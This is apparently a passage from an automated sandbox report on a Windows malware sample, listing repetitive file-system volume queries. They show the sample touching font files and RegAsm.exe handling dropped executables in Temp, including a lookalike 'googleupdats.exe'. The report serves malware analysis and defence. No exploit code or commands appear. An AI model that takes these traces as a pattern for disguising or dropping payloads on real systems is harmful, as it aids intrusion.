Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000271001\loli.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000271001\loli.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000272001\googleupdats.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000272001\googleupdats.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
